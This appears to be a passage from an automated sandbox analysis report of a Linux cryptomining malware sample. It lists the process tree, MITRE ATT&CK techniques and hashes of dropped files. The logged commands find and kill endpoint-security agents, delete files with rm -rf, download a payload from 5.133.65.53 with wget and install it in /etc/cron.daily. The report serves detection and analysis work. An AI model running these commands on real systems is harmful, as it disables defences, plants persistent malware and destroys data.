  PID:2101
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2100
- /bin/grep
  grep ds_agent
  2⤵
  PID:2105
- /bin/grep
  grep -v grep
  2⤵
  PID:2104
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2103
- /bin/grep
  grep vm-agent
  2⤵
  PID:2108
- /bin/grep
  grep -v grep
  2⤵
  PID:2107
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2106
- /bin/grep
  grep mysqll
  2⤵
  PID:2111
- /bin/grep
  grep -v grep
  2⤵
  PID:2110
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2109
- /bin/grep
  grep linux_client
  2⤵
  PID:2114
- /bin/grep
  grep -v grep
  2⤵
  PID:2113
- /bin/ps
  ps cax
  2⤵
  PID:2112
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:2119
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:2120
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:2120
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:2120
- - /usr/bin/kill
    kill -9
    3⤵
    PID:2120
- - /sbin/kill
    kill -9
    3⤵
    PID:2120
- - /bin/kill
    kill -9
    3⤵
    PID:2120
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:2118
- /bin/grep
  grep -v grep
  2⤵
  PID:2117
- /bin/grep
  grep linux_client
  2⤵
  PID:2116
- /bin/ps
  ps -eaf
  2⤵
  PID:2115
- /bin/grep
  grep edr_agent
  2⤵
  PID:2123
- /bin/grep
  grep -v grep
  2⤵
  PID:2122
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2121
- /bin/grep
  grep edr_agent
  2⤵
  PID:2126
- /bin/grep
  grep -v grep
  2⤵
  PID:2125
- /bin/ps
  ps -eo cmd
  2⤵
  PID:2124
- /bin/grep
  grep xs_agent
  2⤵
  PID:2129
- /bin/grep
  grep -v grep
  2⤵
  PID:2128
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2127
- /bin/grep
  grep cwpp_agent
  2⤵
  PID:2132
- /bin/grep
  grep -v grep
  2⤵
  PID:2131
- /bin/ps
  ps -eo cmd
  2⤵
  PID:2130
- /bin/grep
  grep ds_agent
  2⤵
  PID:2135
- /bin/grep
  grep -v grep
  2⤵
  PID:2134
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads runtime system information
  PID:2133
- /bin/grep
  grep guard_client
  2⤵
  PID:2138
- /bin/grep
  grep -v grep
  2⤵
  PID:2137
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:2136
- /bin/grep
  grep qaxsafe
  2⤵
  PID:2141
- /bin/grep
  grep -v grep
  2⤵
  PID:2140
- /bin/ps
  ps -eo cmd
  2⤵
  PID:2139
- /bin/grep
  grep clamav
  2⤵
  PID:2144
- /bin/grep
  grep -v grep
  2⤵
  PID:2143
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:2142
- /bin/grep
  grep 360safed
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps -eo cmd
  2⤵
  PID:2145
- /bin/grep
  grep eppagent
  2⤵
  PID:2150
- /bin/grep
  grep -v grep
  2⤵
  PID:2149
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2148
- /bin/rm
  rm -rf "/home/*/.local/share/Trash/*/**"
  2⤵
  PID:2151
- /bin/rm
  rm -rf "/root/.local/share/Trash/*/**"
  2⤵
  PID:2152
- /bin/rm
  rm -rf "/usr/share/man/??"
  2⤵
  PID:2153
- /bin/rm
  rm -rf "/usr/share/man/??_*"
  2⤵
  PID:2154
- /bin/rm
  rm -rf "/core.*"
  2⤵
  PID:2155
- /bin/rm
  rm -fr /root/install
  2⤵
  PID:2156
- /bin/rm
  rm -fr /boot/xmrig
  2⤵
  PID:2157
- /bin/rm
  rm -fr /root/xmrig
  2⤵
  PID:2158
- /bin/rm
  rm -fr /kinettd
  2⤵
  PID:2159
- /usr/bin/pkill
  pkill -9 abrtd
  2⤵
  - Reads runtime system information
  PID:2160
- /bin/rm
  rm -fr /root/nohup.out
  2⤵
  PID:2161

/usr/bin/dirname
dirname /tmp/.adxintrin_b
1⤵
PID:1792

/usr/bin/dirname
dirname /tmp/.adxintrin_b
1⤵
PID:1929

/bin/grep
grep -v ulimit
1⤵
PID:1942

/bin/grep
grep -v tar.gz
1⤵
PID:1941

/usr/bin/wc
wc -l
1⤵
PID:1944

/bin/grep
grep libgcc_a
1⤵
PID:1943

/bin/grep
grep -v defunct
1⤵
PID:1940

/bin/grep
grep -v grep
1⤵
PID:1939

/bin/ps
ps -eaf
1⤵
- Reads runtime system information
PID:1938

/bin/sleep
sleep 30
1⤵
PID:1953

/usr/bin/arch
arch
1⤵
PID:1955

/usr/bin/dpkg
dpkg -i /root/gcclib/xinetd_2.3.15-7_amd64.deb
1⤵
PID:1956

/bin/sed
sed -r "s/ //g"
1⤵
PID:1961

/bin/sed
sed -r "s#(http?://)?([^/]+)(.*)#\\15.133.65.53\\3#"
1⤵
PID:1964

/bin/grep
grep -q -- --tries
1⤵
PID:1966

/usr/bin/wget
wget -h
1⤵
PID:1965

/usr/bin/wget
wget "--timeout=10" "--tries=3" -O /tmp/tmp.file http://5.133.65.53/soft/linux/xbash
1⤵
- Writes file to tmp directory
PID:1967

/bin/cat
cat /tmp/tmp.file
1⤵
PID:1971

/bin/mkdir
mkdir -p /root/gcclib
1⤵
PID:1972

/bin/date
date "+%F %T"
1⤵
PID:1973

/bin/mv
mv -f /tmp/tmp.file /etc/cron.daily/xbash
1⤵
PID:1974

/bin/chmod
chmod 755 /etc/cron.daily/xbash
1⤵
PID:1975

/usr/bin/dirname
dirname /tmp/.adxintrin_b
1⤵
PID:1990

/bin/grep
grep -m1 -oP "\"pool\"\\s*:\\s*\"\\K[^\"]+"
1⤵
PID:2005

/usr/bin/wget
wget "--timeout=3" "--tries=1" -qO- 127.0.0.1:999/api.json
1⤵
PID:2004

/bin/grep
grep -A1 hashrate
1⤵
PID:2008

/bin/sed
sed "s/\"hashrate\": {//g"
1⤵
PID:2009

/bin/sed
sed -e "/^ *\$/d"
1⤵
PID:2010

/bin/sed
sed "s/\"total\": //g"
1⤵
PID:2011

/bin/sed
sed "s/ \\{1,\\}/ /g"
1⤵
PID:2012

/bin/sed
sed -e "s/,\$//"
1⤵
PID:2013

/usr/bin/wget
wget "--timeout=3" "--tries=1" -qO- 127.0.0.1:999/api.json
1⤵
PID:2007

/bin/sed
sed -rn "s/.*\"diff_current\":\"?([^\",]+)\"?.*/\\1/p"
1⤵
PID:2016

/usr/bin/wget
wget "--timeout=3" "--tries=1" -qO- 127.0.0.1:999/api.json
1⤵
PID:2015

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/gcclib/date

Filesize
20B

MD5
af54a84fa84e64e6962cc73534b3bd39

SHA1
a4d4ae90dca3b553f8c8e7cb9567d398c5646bc1

SHA256
565724cbad138d97f48f8d6ad47d7939340581a843ced16dee3c701faef6ca41

SHA512
1341687f744e1205272182813cd435aa92c898607e8088fdb7983465f5136d30147412ef484d8baa9854b308d0081c3760906d5fdcb52daf42ae815d46d4d3e3

Download Submit
/tmp/sh-thd.MjtGzf

Filesize
350B

MD5
9c538d4bbd00d98f87ebd7bab0454d9b

SHA1
9ba3b20e41a6183e47810e2f90ec66cddca7a505

SHA256
fd206fcd48cbb2fb88c274f2d7a4eb226fddd49ff517074dfe95cc7fd8da65cf

SHA512
2f76d88e9492c28bdc446e69b6f3c6c79985d66ea526012cbac10146c06f0ddd47541d1b79b0de6a66c58c9d53b1d2dc967c9aac0f8ab2ee84f1b8fd7d3dc021

Download Submit
/tmp/tmp.file

Filesize
150KB

MD5
ab1d3045086a3bee9b26bc87a77f36d7

SHA1
75d51c8475445d9972c75b460e28f40549a0a96d

SHA256
e936607c7cd21c437fd3667fe44246e99966adfddc9ba11c3898216b41d1351c

SHA512
c9223df9c12b85128dc0809537207b42e6bb3244cc8a1ad5b13d2fbf9857cae36426e5250ed225a19bd2ec78e5c7410752056cd358aa46cb0aecab5111eaf910

Download Submit
/tmp/tmp.file

Filesize
59KB

MD5
de03a43a8873b4411af7c7c50478f58e

SHA1
5c8528ca1d40117c357fe360c1fc0705be09275f

SHA256
388491f63811fcba51d67c63dfedb1eb17652445b04837d28f3a2dd7d671a99e

SHA512
dcf3a4a2e899dc4e601cda9401014cb448a5b08c679cc080811eb4f2e8cbf8a05003929a356ced0ff14a8979efc0d56b261316619530cf272803f4b02be0e69f

Download Submit
/tmp/tmp.file

Filesize
35KB

MD5
1f35b7fa411c775de6401e021d932dba

SHA1
4c67c24aefc13307456a8c806647f2fb91021817

SHA256
453d751924e2b1711cb3f33a65f0d073d0b0c71627d93252501fb3cee06badbb

SHA512
7a5f7f704590c1aecbd9b852e64bf7521c0fd72cc595a20a3ac47b0925cd895da3d662ae2aac052380b68633530c12049a024af410844a3e48c8fc1e01ce9227

Download Submit
/tmp/tmp.file

Filesize
30KB

MD5
021ef44d82ffe0fd839c1226d01cd13b

SHA1
da3c9364d8ea16e73921aa6f4003b1b5607cd5f9

SHA256
e30e7a1673d592edc5beb63e9379a7a0848967ac33fe78d2a656a7a4bae28992

SHA512
a7ce0173e59673f602a58d3b08245029924e318984071673af4b03c2e6b892889d819281c41424e540e49d0f3a83c20aa1f0199fb77645477500eb15c7045636

Download Submit
/usr/adxintrin_b.pid

Filesize
5B

MD5
c05ee40bdbe097172d42c429a875198d

SHA1
228415277afbc76927f310976474d1b491e6695d

SHA256
bc2a609f4f1fd111c4e4f29cda2c5ac6c2310184346fdc0673e68f81ee2060b9

SHA512
007df8abed8cb830a1986f770ec9ac44bf9af86988a50d05aad84b77d446817540244044fcd03af33be0d1c7cbccd8d765d8f8bd97aedc18e19c0fac33365333

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
edae9b7299f2afc09258160786a4dada

SHA1
dd7aa0c8aa29e937efd88b9eb39811e1460b62b9

SHA256
cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569

SHA512
0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads